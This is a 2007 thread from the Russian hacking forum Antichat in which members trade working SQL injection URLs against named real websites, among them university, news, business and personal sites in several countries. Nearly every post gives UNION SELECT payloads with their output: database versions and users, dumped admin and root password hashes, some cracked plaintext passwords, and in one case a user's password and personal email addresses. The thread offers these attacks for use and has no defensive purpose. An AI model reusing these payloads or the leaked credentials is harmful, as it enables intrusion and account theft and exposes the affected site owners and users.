28.11.2007, 23:56
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
experts.uchicago.edu
Код:
http://experts.uchicago.edu/experts.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+--+
4.0.24-standard
Код:
http://experts.uchicago.edu/experts.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+mysql.user+limit+0,1+--+
Код:
root:0bd914e54597ba5d
|
|
|
29.11.2007, 00:24
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами:
10488959
Репутация:
474
|
|
Duke News
http://dukemednews.duke. edu
Сама скуля:
Код:
http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0
Выводим столбцы:
Код:
http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,3,4/*
//будут в самом низу справа
Выводим имя_пользователя:версию_бд: имя_бд:
Код:
http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4/*
web@vml-news.duhs.duke.edu:4.0.18:news
File_priv выкл:
Код:
http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,load_file(0x2F6574632F706173737764),4/*
Есть доступ в mysql.user
Код:
http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,concat_ws(0x3a,user,password),4+from+mysql.user/*
Специально для вас расшифровал 
Код:
mnogosearch:0547d8b07eba42f3:gh34mx92
root:623460e26f081bbc:mt01du01
web:761b2fc844890384:fr56nv29
Соседствующие сайты:
Код:
1) news.mc.duke.edu
2) dukemednews.duke.edu
3) dukemednews.com
4) dukemednews.org
админка:
Код:
http://dukemednews.duke.edu/admin
Пока все 
Последний раз редактировалось ENFIX; 29.11.2007 в 00:26..
|
|
|
|
29.11.2007, 01:13
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
С нами:
10787366
Репутация:
2277
|
|
dialog.kz
http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,concat_ws(0x3a3a,version( ),user(),database()),6,7,8,9,10,11,12,13,14+from+u sers/*'
4.1.22-standard::dialog_hl@localhost::dialog_hl
http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+ from+users/*'
коннект хреновый, подберите поля и юзайте =)
|
|
|
|
29.11.2007, 01:32
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
Сообщение от halkfild
dialog.kz
http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+ from+users/*
коннект хреновый, подберите поля и юзайте =)
http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,concat_ws(char(58),userna me,userpass),6,7,8,9,10,11,12,13,14+from+users/*
admin:edf95addf04ca869faa73677ae66f5ea
http://www.needaplacetogo.co.uk/fashion.asp?id=1+or+1=(SELECT+TOP+1+cast(M_USERNAM E+as+nvarchar)%2B%27%3A%27%2Bcast(M_PASSWORD+as+nv archar)+from+FORUM_MEMBERS+WHERE+MEMBER_ID=1)--
Последний раз редактировалось Ded MustD!e; 29.11.2007 в 01:46..
|
|
|
|
29.11.2007, 09:39
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами:
10194175
Репутация:
524
|
|
Италия
Powered By Centro Studi Airone
Уязвимость в скрипте leggi.php
Примеры:
Код:
http://www.deltard.com/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database( ),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&
4.1.22-standard-log:Sql84077_1:Sql84077@62.149.140.88
Код:
http://www.onecapital.it/homepage/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
4.0.27-standard-log:Sql20147_3:Sql20147@62.149.140.29
Код:
http://www.anguillarainforma.it/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
4.0.27-standard-log:Sql24700_1:Sql24700@62.149.140.36
Код:
http://www.101vetrine.it/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),databas e(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
4.0.27-standard-log:Sql72154_1:Sql72154@62.149.140.28
|
|
|
|
29.11.2007, 11:44
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 94
С нами:
9734391
Репутация:
71
|
|
http://www.vedo.ru
Код:
http://www.vedo.ru/guest/guest.php?id=-1+union+select+1,2,username,user_password,5,6,7,8+from+phpbb_users/*
admin:061ed190e137ee416c25b4e8658fd3a3
http://www.redbullreaccion.com/
Код:
http://www.redbullreaccion.com/news_detail.php?lang=en&id=-1+union+select+1,2,3,user(),version(),6,database(),8,9,10/*
|
|
|
|
29.11.2007, 13:20
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
akce.cvut.cz
https://akce.cvut.cz/?node=cal-en&aid=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),d atabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,1,1,1,1,1,1,1,1,1/*
4.1.11-Debian_4sarge7-log/akce/akce@localhost
https://akce.cvut.cz/?node=cal-en&aid=-1'+union+select+1,2,3,4,concat_ws(0x2F,cast(userna me+as+binary),cast(password+as+binary)),6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,1,1,1,1,1,1,1,1,1+f rom+users/*
логин/хеш
admin/*474ECE06942A2A91CBB3CB29D6C6F6A97C449630 прикольный хеш ))
---------------------------------------------------------------------
http://www.balka.kharkov.ua/select_ss.php?tp=1&ss=-1+union+select+1,concat_ws(0x2F,version(),database (),user())/*
4.0.27/portal/adminkh@localhost
--------------------------------------------------------------------
http://www.megaspravka.ru/news_show.php?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7/*
4.1.22/wwwmegaspravkaru/megaspra@localhost
|
|
|
|
29.11.2007, 16:06
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами:
10194175
Репутация:
524
|
|
Италия
gsteam.biz
Код:
http://www.gsteam.biz/video.php?media_ID=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),4/*
4.1.11-Debian_4sarge7-log:gsteam_biz:jbag0007@localhost
portalstiri.com
Код:
http://www.portalstiri.com/stiri.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
4.1.22-standard : pstiri_pstiridb : pstiri@localhost
emcquadro.com - ПОЗОР!!!
Код:
http://www.emcquadro.com/php.php?id_arg=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
4.1.22-standard-log:emcquadr_emcquadr13860:emcquadr_interne@localh ost
inputdata.net
Код:
http://www.inputdata.net/concordia/sezione.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6/*
4.0.27-standard-log:Sql19754_3:Sql19754@62.149.140.114
infomedia2000.it
Код:
http://www.infomedia2000.it/prometeo/sezione.php?ID=1%20AND%20ascii(lower(substring(version(),1,1)))=51/*
version() : 3.23.58
viaggiavventurenelmondo.it
Код:
http://www.viaggiavventurenelmondo.it/nuovosito/eventi/cdoc/entry.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9/*
5.0.37-log:cdocanm:anm_sites@172.17.0.76
201 таблица:
Код:
http://www.viaggiavventurenelmondo.it/nuovosito/eventi/cdoc/entry.php?id=-1+union+select+table_name,2,3,4,5,6,7,8,9+from+information_schema.tables+limit+200,1/*
Админ [ логин : пасс ] :
Код:
simz : stealthx77cdd
|
|
|
|
29.11.2007, 16:29
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
clubsss.com
http://clubsss.com/lvov/show_club.php?club=-1+union+select+1,2,concat_ws(0x2F,cast(version()+a s+binary),cast(database()+as+binary),cast(user()+a s+binary)),4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1/*
4.1.8-standard/conus_clubsss/conus_clubsss@localhost
http://clubsss.com/lvov/show_club.php?club=-1+union+select+1,password,3,4,5,6,7,8,9,1,1,1,1,1, 1,1,1,1,1+from+users/*
хеш колумн с логином не подобрал (
-----------------------------------------------------------------------------
myworld.md
http://www.myworld.md/myprofile.php?idd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x2F,version(),database(),user()),16,17,18 ,19,1,1,1,1,1,1,1,1,1/*
5.0.27/13195/13195@localhost
http://www.myworld.md/myprofile.php?idd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x2F,nic,mail_all,mail_secret,upass),16,17 ,18,19,1,1,1,1,1,1,1,1,1+from+user+limit+13,1/*
логин/общее мыло/секретное мыло/пароль не хеш.
sestri4ka/starka777@rambler.ru/kaneva_t@mail.ru/sanika
----------------------------------------------------------------------------
4lover.de
http://4lover.de/view.php?l=&id=-1'+union+select+1,2,concat_ws(0x2F,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1/*
5.0.45/DB179434/U179434@bravd.store
Есть доступ к information_schema
|
|
|
|
29.11.2007, 17:02
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами:
10054253
Репутация:
86
|
|
Код:
http://www.afdspn.it/articolo.php?id=-1+union+select+1,concat_ws(0x3a,0x3a,user(),0x3a,database(),0x3a,version(),0x3a,0x3a)/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
